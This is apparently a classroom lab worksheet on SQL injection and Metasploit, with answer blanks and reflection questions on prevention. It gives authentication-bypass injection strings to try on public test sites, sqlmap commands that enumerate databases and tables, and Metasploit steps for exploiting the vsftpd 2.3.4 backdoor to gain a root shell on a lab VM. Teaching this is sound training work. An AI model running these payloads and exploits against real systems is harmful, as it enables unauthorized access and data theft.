
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is purely for educational purposes. I don't even know you.

Task 1: SQL Injection & Metasploit


1.1 Web Attack Using SQL Injection

SQL injection (SQLi) is an application security weakness that allows attackers to control an
application's database by tricking the application into sending unexpected SQL commands,
letting them read or delete data, change the application's data-driven behaviour, and do other
undesirable things. SQL injections are among the most frequent threats to data security.

i. Learn SQL Injection Technique

The exercise is adapted from https://www.guru99.com/learn-sql-injection-with-practical-example.html

The types of attacks that can be performed using SQL injection vary depending on
the type of database engine. The attack works on dynamic SQL statements. A
dynamic statement is a statement that is generated at run time from parameters,
such as a password taken from a web form or a URI query string.

Let’s consider a simple web application with a login form. The code for the HTML
form is shown below.

<form action="index.php" method="post">
    <input type="email" name="email" required="required"/>
    <input type="password" name="password"/>
    <input type="checkbox" name="remember_me" value="Remember me"/>
    <input type="submit" value="Submit"/>
</form>

• The above form accepts the email address and password, then submits them
to a PHP file named index.php.
• It has an option of storing the login session in a cookie. We have deduced this
from the remember_me checkbox. It uses the POST method to submit data,
which means the values are not displayed in the URL.

Let's suppose the statement at the backend for checking the user ID is as follows:

SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);


• The above statement uses the values of the $_POST[] array directly without
sanitizing them.
• The password is hashed using the MD5 algorithm.

We will illustrate the SQL injection attack using SQL Fiddle. Open the URL
http://sqlfiddle.com/ in your web browser.

Note: you will have to type the SQL statements yourself.

Step 1) Enter this code in the left pane

CREATE TABLE `users` (
    `id` INT NOT NULL AUTO_INCREMENT,
    `email` VARCHAR(45) NULL,
    `password` VARCHAR(45) NULL,
    PRIMARY KEY (`id`));

insert into users (email,password) values ('m@m.com',md5('abc'));

Step 2) Click Build Schema

Step 3) Enter this code in the right pane

select * from users;

Step 4) Click Run SQL and you will see the query output. Answer the question: what
is the password in its hashed form?

____________________________________________________________________

____________________________________________________________________

Suppose the user supplies admin@admin.sys and 1234 as the password. The statement
to be executed against the database would be

SELECT * FROM users WHERE email = 'admin@admin.sys' AND password = md5('1234');


The above code can be exploited by commenting out the password part and
appending a condition that will always be true. Let's suppose an attacker provides the
following input in the email address field

xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]

and xxx for the password.

The generated dynamic statement will be as follows.

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('xxx');

• xxx@xxx.xxx' ends with a single quote, which completes the string quote.
• OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned
results to only one record.
• -- ' AND … is a SQL comment that eliminates the password part.

Copy the above SQL statement and paste it into the SQL Fiddle Run SQL text box. When
you run the statement, you can see that it returns a record (including the password hash).
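Added example (not from the lab or from guru99): a small Python/sqlite3 model of the lab's login check, showing that the string-built query accepts the `xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]` input while a parameterised query rejects it. The users table and the m@m.com/abc row are constructed to match Step 1; sqlite3 has no md5() function, so the hash is computed in Python, as the PHP md5() call would.

```python
import hashlib
import sqlite3

# Constructed sample data mirroring the lab's users table (Step 1).
SAMPLE_EMAIL = "m@m.com"
SAMPLE_PASSWORD = "abc"

# The email-field input from the lab; the password field holds "xxx".
BYPASS_INPUT = "xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]"


def md5_hex(password: str) -> str:
    """Unsalted MD5, as the lab's backend uses it (weak, shown only to mirror the lab)."""
    return hashlib.md5(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the SQL Fiddle schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, "
                 "email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)",
                 (SAMPLE_EMAIL, md5_hex(SAMPLE_PASSWORD)))
    conn.commit()
    return conn


def login_vulnerable(conn, email: str, password: str):
    """Mirrors the lab backend: user input is pasted straight into the SQL text.
    A quote in `email` ends the literal early; `--` comments out the password check."""
    sql = (f"SELECT * FROM users WHERE email = '{email}' "
           f"AND password = '{md5_hex(password)}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, email: str, password: str):
    """Parameterised query: the driver sends the input as a bound value, so the
    quote and the comment marker are just characters of the email string."""
    sql = "SELECT * FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, md5_hex(password))).fetchone()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_INPUT, "xxx"))  # returns the m@m.com row
    print("safe:      ", login_safe(db, BYPASS_INPUT, "xxx"))        # returns None
```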

In your opinion, why is this dangerous to the web application?

____________________________________________________________________

____________________________________________________________________

ii. SQL Injection Practice

Open this test site: https://demo.testfire.net/. Then click the online banking login page.
The page will ask you to enter a username and password; you can use the SQL
injection technique to bypass the authentication and gain admin privileges. Enter
the following statement in the username and password fields to bypass the authentication:

' or 1=1--+

Once you have gained the admin credentials, please provide a screenshot of the admin
page.
____________________________________________________________________

____________________________________________________________________

How many account details can you view from the admin page? Please list down all
account numbers.
____________________________________________________________________

____________________________________________________________________


iii. SQL Injection using SQLMap Tool

Sqlmap is open-source software used to detect and exploit database
vulnerabilities; it provides options for injecting malicious code into them.

You can run SQLMap in Kali Linux by opening a terminal and typing the command
#sqlmap. In this practice we will use http://testphp.vulnweb.com as the test site.

You can list information about the existing databases with SQLMap using this
command:

# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

From the output, what is the database version and which databases are available on the
server?
____________________________________________________________________

____________________________________________________________________

Next, you can list information about all tables present in a particular database by
using this command:

# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

From the output, please list down all tables available in the database.
____________________________________________________________________

____________________________________________________________________

If you are interested in SQL injection and want to challenge yourself, you can
explore this website: https://redtiger.labs.overthewire.org/


1.2 Network Attack Using Metasploit Tool

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool
for many attackers and defenders. Point Metasploit at your target, pick an exploit, choose the
payload to drop, and hit Enter.

i. Build The Lab Setup

Before we can begin this exercise, we need to set up an additional lab environment.
Firstly, we need to set up an additional internal network. In VirtualBox, click the File menu
> Preferences > Network tab. In the Network tab, please create an additional NAT
Network (call it LabNetwork). After that, you need to import an additional VM known as
Metasploitable (you can get it from me). Metasploitable is a VM which contains
known vulnerabilities.

After you have imported the VM, you need to add a network interface to both the Kali and
Metasploitable VMs. Make sure the additional network interface is connected to the
NAT Network (LabNetwork) which you just created. You may need to restart your Kali
Linux VM and also your Metasploitable VM.

After you have successfully started both VMs, make sure the network is running properly
for both. Check the IP address of each VM using the #ifconfig command in a terminal
and make sure the two VMs can ping each other.

ii. Perform Vulnerability Scanning

Before we can begin to use the Metasploit tool on Kali to create a backdoor on the
Metasploitable VM, we need to first perform a network scan to determine the
vulnerability of the Metasploitable VM. To start the scan, run this command on your Kali
Linux:

# nmap --script ftp-vsftpd-backdoor {your-metasploitableVM-ip} --reason

The scan result will show that the Metasploitable VM has a vulnerability in its FTP
service. Please state when the vulnerability was reported.
____________________________________________________________________

____________________________________________________________________

iii. Run Exploit using Metasploit

After we have determined the vulnerability of the Metasploitable VM using Nmap, it's time
to exploit it using the Metasploit tool in Kali Linux. First you need to run the Metasploit
console by entering #msfconsole in the terminal. After that, you need to search for the FTP
exploit by typing this command: msf> search vsftpd. The search may take a
while. After that, you can start to use the exploit by typing


msf > use exploit/unix/ftp/vsftpd_234_backdoor

Then you need to set the target host by typing msf> set rhost {your-metasploitableVM-ip}

You can also check the exploit options by typing msf> show options. If everything
has been set, you can execute the exploit against the target host by typing msf> exploit. If
everything goes well, you will gain access to the Metasploitable VM shell.

To verify that you have root access, please type whoami; check the VM hostname by
typing hostname. Check the kernel version by typing uname -a. Provide a screenshot
of the output.
____________________________________________________________________

____________________________________________________________________

1.3 Reflection

In your opinion, what are some ways to prevent SQL injection attacks on a website under your
administration?

____________________________________________________________________

____________________________________________________________________

In your opinion, what is a way to prevent an application-level attack using tools such as
Metasploit?

____________________________________________________________________

____________________________________________________________________
